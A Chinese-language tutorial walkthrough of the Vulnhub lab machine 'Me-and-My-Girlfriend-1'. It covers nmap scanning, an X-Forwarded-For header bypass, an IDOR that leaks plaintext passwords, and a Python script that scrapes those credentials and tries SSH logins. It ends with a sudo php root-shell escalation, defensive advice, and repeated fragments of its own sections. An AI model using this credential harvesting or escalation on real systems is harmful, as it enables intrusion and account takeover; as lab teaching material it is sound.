Me-and-My-Girlfriend-1 靶机渗透教学文档<\/h1>

靶机概述<\/h2>

这是一个经典的Vulnhub靶机，适合初学者练习渗透测试技能。靶机难度较低，主要涉及以下技术点：<\/p>

信息收集<\/li>
HTTP头部伪造<\/li>
水平越权<\/li>
SSH登录利用<\/li>

SUID提权<\/li> <\/ul>

详细渗透步骤<\/h2>

1. 信息收集阶段<\/h3>

主机发现<\/h4>

使用nmap进行主机发现：<\/p>

nmap -sn 192.168.1.0\/24
<\/span><\/span><\/code><\/pre>端口扫描<\/h4>
发现靶机开放端口：<\/p>
nmap -sV -p- 192.168.1.xxx
<\/span><\/span><\/code><\/pre>扫描结果显示靶机开放了22(SSH)和80(HTTP)端口。<\/p>
漏洞扫描<\/h4>
执行nmap自带的简单漏洞扫描：<\/p>
nmap --script vuln 192.168.1.xxx
<\/span><\/span><\/code><\/pre>2. Web应用渗透<\/h3>
初始访问<\/h4>
访问80端口网站，首页显示"你不是本地的不能访问"提示，暗示需要本地访问权限。<\/p>
绕过访问限制<\/h4>

查看网页源码，发现提示需要使用X-Forwarded-For<\/code>头部<\/li>
尝试修改请求头，添加以下可能的X-Forwarded-For<\/code>值：

127.0.0.1<\/li>
local<\/li>
localhost<\/li>
0.0.0.0<\/li>
<\/ul>
<\/li>
发现localhost<\/code>值可以成功绕过限制<\/li>
<\/ol>
Burp Suite配置方法<\/strong>：<\/p>

打开Burp Suite<\/li>
进入Proxy -> Options<\/li>
在"Match and Replace"部分添加新规则：

Type: Request header<\/li>
Match: ^X-Forwarded-For:.*<\/li>
Replace: X-Forwarded-For: localhost<\/li>
<\/ul>
<\/li>
启用该规则<\/li>
<\/ol>
用户注册与登录<\/h4>

注册一个新账户<\/li>
登录后发现URL中包含user_id<\/code>参数，形如：
http:\/\/target\/profile.php?user_id=1
<\/code><\/pre>
<\/li>
<\/ol>
水平越权漏洞利用<\/h4>

修改user_id<\/code>参数值，尝试访问其他用户信息<\/li>
发现可以查看其他用户资料<\/li>
在页面源码中可找到其他用户的明文密码<\/li>
<\/ol>
3. SSH登录利用<\/h3>

通过水平越权收集到的用户名和密码<\/li>
尝试使用这些凭据通过SSH登录：
ssh username@target
<\/span><\/span><\/code><\/pre><\/li>
发现alice<\/code>账户可以成功登录（对应user_id=5<\/code>）<\/li>
<\/ol>
自动化脚本思路<\/strong>（Python示例）：<\/p>
import<\/span> requests
<\/span><\/span>import<\/span> paramiko
<\/span><\/span>import<\/span> re
<\/span><\/span>
<\/span><\/span># 获取用户凭证<\/span>
<\/span><\/span>def<\/span> get_credentials<\/span>():
<\/span><\/span>    for<\/span> i in<\/span> range(1<\/span>, 11<\/span>):
<\/span><\/span>        url =<\/span> f<\/span>"http:\/\/target\/profile.php?user_id=<\/span>{<\/span>i}<\/span>"<\/span>
<\/span><\/span>        response =<\/span> requests.<\/span>get(url)
<\/span><\/span>        # 使用正则提取用户名和密码<\/span>
<\/span><\/span>        username =<\/span> re.<\/span>search(r<\/span>"Username: (.*?)<"<\/span>, response.<\/span>text).<\/span>group(1<\/span>)
<\/span><\/span>        password =<\/span> re.<\/span>search(r<\/span>"Password: (.*?)<"<\/span>, response.<\/span>text).<\/span>group(1<\/span>)
<\/span><\/span>        try_ssh_login(username, password)
<\/span><\/span>
<\/span><\/span># 尝试SSH登录<\/span>
<\/span><\/span>def<\/span> try_ssh_login<\/span>(username, password):
<\/span><\/span>    ssh =<\/span> paramiko.<\/span>SSHClient()
<\/span><\/span>    ssh.<\/span>set_missing_host_key_policy(paramiko.<\/span>AutoAddPolicy())
<\/span><\/span>    try<\/span>:
<\/span><\/span>        ssh.<\/span>connect('target'<\/span>, username=<\/span>username, password=<\/span>password)
<\/span><\/span>        print(f<\/span>"Success! Username: <\/span>{<\/span>username}<\/span>, Password: <\/span>{<\/span>password}<\/span>"<\/span>)
<\/span><\/span>        ssh.<\/span>close()
<\/span><\/span>        return<\/span> True<\/span>
<\/span><\/span>    except<\/span>:
<\/span><\/span>        print(f<\/span>"Failed for <\/span>{<\/span>username}<\/span>"<\/span>)
<\/span><\/span>        return<\/span> False<\/span>
<\/span><\/span>
<\/span><\/span>get_credentials()
<\/span><\/span><\/code><\/pre>4. 权限提升<\/h3>


登录alice账户后，检查SUID权限：<\/p>
find \/ -perm -4000 2>\/dev\/null
<\/span><\/span><\/code><\/pre>或<\/p>
sudo -l
<\/span><\/span><\/code><\/pre><\/li>

发现可以以root权限运行php：<\/p>
sudo -l
<\/span><\/span><\/code><\/pre>输出可能包含：<\/p>
(root) NOPASSWD: \/usr\/bin\/php
<\/code><\/pre>
<\/li>

利用php执行特权命令：<\/p>
sudo php -r "system('\/bin\/bash');"<\/span>
<\/span><\/span><\/code><\/pre>或<\/p>
sudo php -r "pcntl_exec('\/bin\/bash', ['-p']);"<\/span>
<\/span><\/span><\/code><\/pre><\/li>

成功获取root shell<\/p>
<\/li>
<\/ol>
关键知识点总结<\/h2>

HTTP头部伪造<\/strong>：X-Forwarded-For<\/code>常用于识别客户端原始IP，可被用于伪造来源<\/li>
水平越权<\/strong>：通过修改ID参数访问其他用户数据，属于不安全的直接对象引用(IDOR)漏洞<\/li>
凭证重用<\/strong>：Web应用中的密码可能被用于系统登录，需测试密码重用情况<\/li>
SUID提权<\/strong>：检查具有SUID位的程序，特别是可以执行命令的解释器(如php、python等)<\/li>
<\/ol>
防御建议<\/h2>

对敏感操作实施严格的权限检查<\/li>
不要在前端源码中暴露敏感信息或提示<\/li>
使用会话管理而非URL参数识别用户<\/li>
实施最小权限原则，限制SUID程序<\/li>
避免密码明文存储和传输<\/li>
对用户输入进行严格过滤和验证<\/li>
<\/ol>
扩展练习<\/h2>

尝试编写自动化脚本完成整个渗透过程<\/li>
探索其他可能的提权路径<\/li>
尝试不使用php的提权方法<\/li>
思考如何防御此类攻击链<\/li>
<\/ol>

Me-and-My-Girlfriend-1 靶机渗透教学文档<\/h1>

详细渗透步骤<\/h2>

1. 信息收集阶段<\/h3>

2. Web应用渗透<\/h3>

初始访问<\/h4> 访问80端口网站，首页显示"你不是本地的不能访问"提示，暗示需要本地访问权限。<\/p>

扩展练习<\/h2> 尝试编写自动化脚本完成整个渗透过程<\/li> 探索其他可能的提权路径<\/li> 尝试不使用php的提权方法<\/li> 思考如何防御此类攻击链<\/li> <\/ol>

初始访问<\/h4>
访问80端口网站，首页显示"你不是本地的不能访问"提示，暗示需要本地访问权限。<\/p>

扩展练习<\/h2>

尝试编写自动化脚本完成整个渗透过程<\/li>
探索其他可能的提权路径<\/li>
尝试不使用php的提权方法<\/li>
思考如何防御此类攻击链<\/li> <\/ol>